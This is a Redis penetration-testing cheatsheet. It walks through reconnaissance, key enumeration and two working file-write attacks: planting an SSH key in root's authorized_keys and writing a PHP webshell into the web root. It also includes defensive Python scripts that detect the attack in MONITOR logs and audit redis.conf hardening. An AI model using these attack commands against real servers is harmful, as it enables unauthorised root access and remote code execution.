
Redis Enum & Exp

This cheatsheet focuses on Redis (Remote Dictionary Server). It is an in-memory key-value store frequently left unauthenticated on internal networks, providing direct pathways to sensitive data exposure or Remote Code Execution (RCE).

Reconnaissance

Redis typically runs on port 6379. The initial goal is to identify the service and check if it allows anonymous access.

# Extract version info and check for unauthenticated access
nmap -p 6379 --script redis-info 10.10.10.10

# Connect directly to the Redis instance
redis-cli -h 10.10.10.10

# Connect with a password (if authentication is enforced)
redis-cli -h 10.10.10.10 -a "password"

Enumeration

Once connected to the Redis prompt (10.10.10.10:6379>), gather system configuration details and dump stored keys to find credentials or application secrets.

Efficiency

The INFO command is your best starting point. It dumps the OS version, Redis version, and the absolute paths to configuration files, which is critical for planning file-write exploits.

# Display server information and statistics
10.10.10.10:6379> INFO

# List all keys in the current database
10.10.10.10:6379> KEYS *

# Read the plaintext contents of a specific key
10.10.10.10:6379> GET <key_name>

# View all active configuration parameters
10.10.10.10:6379> CONFIG GET *

Rabbit Hole

Redis supports multiple logical databases (indexed by numbers, usually 0-15). If KEYS * returns nothing, you might just be in an empty database. Switch databases using the SELECT <index> command (e.g., SELECT 1) before searching for keys again.


Exploitation

If the Redis instance runs with high privileges (e.g., root or www-data), you can leverage its native database save mechanism to write arbitrary files to the target file system.

# 1. Generate an SSH keypair locally and pad the public key with newlines
ssh-keygen -t rsa -f mykey
(echo -e "\n\n"; cat mykey.pub; echo -e "\n\n") > foo.txt

# 2. Push the padded public key into a temporary Redis key
cat foo.txt | redis-cli -h 10.10.10.10 -x set crackit

# 3. Connect to Redis and configure the save path to the root SSH directory
redis-cli -h 10.10.10.10
10.10.10.10:6379> CONFIG SET dir /root/.ssh/
10.10.10.10:6379> CONFIG SET dbfilename "authorized_keys"
10.10.10.10:6379> SAVE

# 4. SSH directly into the box
ssh -i mykey root@10.10.10.10

# Alternative: write a PHP webshell directly into the web root
redis-cli -h 10.10.10.10
10.10.10.10:6379> CONFIG SET dir /var/www/html/
10.10.10.10:6379> CONFIG SET dbfilename shell.php
10.10.10.10:6379> SET payload "<?php system($_GET['cmd']); ?>"
10.10.10.10:6379> SAVE
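The defender's view of the sequence above, added here as an example that is not part of the original cheatsheet: both write primitives share one observable fingerprint, a client issuing CONFIG SET dir and/or CONFIG SET dbfilename and then forcing SAVE or BGSAVE. The script below parses Redis MONITOR output (format as documented by Redis: timestamp, [db client], quoted argv) and raises a high-severity finding when that sequence comes from a single client within a time window. The MONITOR stream, client addresses and timestamps are constructed for the example; in production you would feed it a captured stream or equivalent proxy logs rather than leaving MONITOR running.

```python
import re
from collections import defaultdict

# MONITOR output format as documented by Redis:
#   <unix-timestamp> [<db> <client-ip:port>] "CMD" "arg1" "arg2" ...
MONITOR_RE = re.compile(
    r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$'
)
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Configuration keys that redirect where SAVE/BGSAVE writes the RDB dump.
SENSITIVE_CONFIG_KEYS = {"dir", "dbfilename"}

# Constructed sample stream (not captured from a real host). The client on
# 10.10.10.10 reproduces the dir/dbfilename/SAVE sequence from the
# Exploitation section; the client on 10.10.10.50 is ordinary traffic.
SAMPLE_MONITOR = """\
1700000000.100000 [0 10.10.10.50:41000] "GET" "session:abc"
1700000001.200000 [0 10.10.10.50:41000] "SET" "session:abc" "user=alice"
1700000002.300000 [0 10.10.10.10:54321] "CONFIG" "SET" "dir" "/root/.ssh/"
1700000003.400000 [0 10.10.10.10:54321] "CONFIG" "SET" "dbfilename" "authorized_keys"
1700000004.500000 [0 10.10.10.10:54321] "SAVE"
1700000005.600000 [0 10.10.10.50:41000] "CONFIG" "GET" "maxmemory"
"""


def parse_monitor_line(line):
    """Split one MONITOR line into its timestamp, db, client and argv."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    return {
        "ts": float(m.group("ts")),
        "db": int(m.group("db")),
        "client": m.group("client"),
        "args": ARG_RE.findall(m.group("args")),
    }


def detect_dump_redirection(monitor_text, window_seconds=300):
    """Flag clients that retarget the RDB dump path and then force a save.

    Every CONFIG SET dir/dbfilename is reported on its own (medium); a
    SAVE/BGSAVE from the same client within window_seconds of such a change
    is escalated to high, because that is the moment the file is written.
    """
    findings = []
    staged = defaultdict(dict)  # client -> {config key: (value, ts)}
    for raw in monitor_text.splitlines():
        ev = parse_monitor_line(raw)
        if not ev or not ev["args"]:
            continue
        cmd, args, client = ev["args"][0].upper(), ev["args"][1:], ev["client"]
        if (cmd == "CONFIG" and len(args) >= 3 and args[0].upper() == "SET"
                and args[1].lower() in SENSITIVE_CONFIG_KEYS):
            key, value = args[1].lower(), args[2]
            staged[client][key] = (value, ev["ts"])
            findings.append({"severity": "medium", "client": client, "ts": ev["ts"],
                             "reason": f"CONFIG SET {key} {value!r}"})
        elif cmd in ("SAVE", "BGSAVE"):
            recent = {k: v for k, (v, t) in staged[client].items()
                      if ev["ts"] - t <= window_seconds}
            if recent:
                target = (recent.get("dir", "<unchanged dir>").rstrip("/") + "/"
                          + recent.get("dbfilename", "<unchanged dbfilename>"))
                findings.append({"severity": "high", "client": client, "ts": ev["ts"],
                                 "reason": f"{cmd} after redirecting dump to {target}"})
                staged.pop(client, None)
    return findings


if __name__ == "__main__":
    for f in detect_dump_redirection(SAMPLE_MONITOR):
        print(f["severity"].upper(), f["client"], f["reason"])
```

The medium findings on their own already deserve a look: there is almost no legitimate reason for an application client to change dir or dbfilename at runtime, so an allow-list of administrative source addresses is usually enough to separate noise from attack.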

Privilege Escalation

While Redis itself is usually the mechanism for privilege escalation (via the root SSH key trick), you may encounter hardened, authenticated Redis instances. If you compromise a low-privileged shell on the host, always check local configuration files for plaintext Redis passwords.

Important

In secure environments, the Redis service is bound strictly to 127.0.0.1 (localhost), making it inaccessible from the outside. If you get a foothold on the machine, you can interact with it locally or use an SSH tunnel (ssh -L 6379:127.0.0.1:6379 user@10.10.10.10) to exploit it from your attacking machine.
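The bind-to-localhost advice above, the missing-auth default and the CONFIG-driven file write all come down to a handful of redis.conf directives. As an added example (not part of the original cheatsheet), the Python audit below parses a redis.conf and reports the weak settings side by side with the hardened form: a wildcard or absent bind, protected-mode switched off, no requirepass and no ACL password on the default user, and CONFIG neither renamed away nor denied through an ACL. Both sample configurations are constructed, and the password placeholder is an assumption.

```python
import shlex

# Constructed sample configurations (not taken from any real host). WEAK_CONF
# is the shape of a default-ish internal deployment; HARDENED_CONF closes the
# holes this cheatsheet relies on. The placeholder password is an assumption.
WEAK_CONF = """\
# redis.conf - reachable from the whole internal network
bind 0.0.0.0
protected-mode no
port 6379
dir /var/www/html
dbfilename dump.rdb
"""

HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass "<replace-with-long-random-secret>"
rename-command CONFIG ""
dir /var/lib/redis
dbfilename dump.rdb
"""

WILDCARD_BINDS = {"0.0.0.0", "*", "::", "-::*"}


def parse_redis_conf(text):
    """Parse redis.conf text into {directive: [argv, argv, ...]}.

    Directives may repeat (several rename-command lines, several ACL user
    lines), so each maps to a list of argument lists. shlex handles the
    quoted empty string used by `rename-command CONFIG ""`.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return (severity, directive, message) findings for the config text."""
    conf = parse_redis_conf(text)
    findings = []

    # 1. Network exposure: no bind line, or a wildcard bind address.
    binds = [a for argv in conf.get("bind", []) for a in argv]
    if not binds:
        findings.append(("high", "bind",
                         "no bind directive: Redis listens on every interface"))
    elif any(b in WILDCARD_BINDS for b in binds):
        findings.append(("high", "bind",
                         f"wildcard bind {binds}: reachable from the network"))

    # 2. protected-mode explicitly switched off (default is yes since 3.2).
    pm = conf.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no":
        findings.append(("high", "protected-mode",
                         "protected-mode no: remote unauthenticated clients are not refused"))

    # 3. Authentication: legacy requirepass, or an ACL default user with a password.
    rp = conf.get("requirepass", [[]])[-1]
    has_requirepass = bool(rp) and rp[0] != ""
    default_user = [argv for argv in conf.get("user", []) if argv and argv[0] == "default"]
    default_nopass = any("nopass" in argv for argv in default_user)
    if not has_requirepass and (not default_user or default_nopass):
        findings.append(("high", "requirepass",
                         "no password: anyone who can reach the port has full access"))

    # 4. CONFIG still reachable: neither renamed away nor denied through ACLs.
    config_renamed = any(argv and argv[0].upper() == "CONFIG"
                         for argv in conf.get("rename-command", []))
    config_denied = any(tok.lower() in ("-config", "-@admin", "-@dangerous")
                        for argv in conf.get("user", []) for tok in argv)
    if not (config_renamed or config_denied):
        findings.append(("medium", "rename-command",
                         "CONFIG reachable: dir/dbfilename can be redirected and SAVE used to write files"))
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or "no findings")
```

The same checks map directly onto the output of CONFIG GET * from the Enumeration section, so the audit doubles as a quick read of what an exposed instance is actually protected by. On Redis 6 and later, ACL rules (`-config` or `-@dangerous` on the users applications run as) are the supported way to keep CONFIG out of reach; rename-command is the older mechanism and is still honoured.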


Post-Mortem & Methodology Notes

  • Default Lack of Auth: Historically, Redis did not require authentication by default. Always attempt to connect without passing credentials first. Note that Redis 3.2 and later ship with protected-mode enabled, which refuses connections from non-loopback addresses when no bind address and no password are configured; an instance that answers remotely without a password has had that protection disabled or has been explicitly bound to a network interface.
  • Padding is Mandatory: When writing SSH keys via Redis, the database dump includes extra binary data. If you don't pad your public key with newlines (\n\n), the authorized_keys parser on the target will fail to read it cleanly.
  • Path Enumeration: The web shell exploitation method relies entirely on knowing the exact absolute path to the web root. Use the INFO command or prior HTTP enumeration to identify non-standard paths before attempting the write.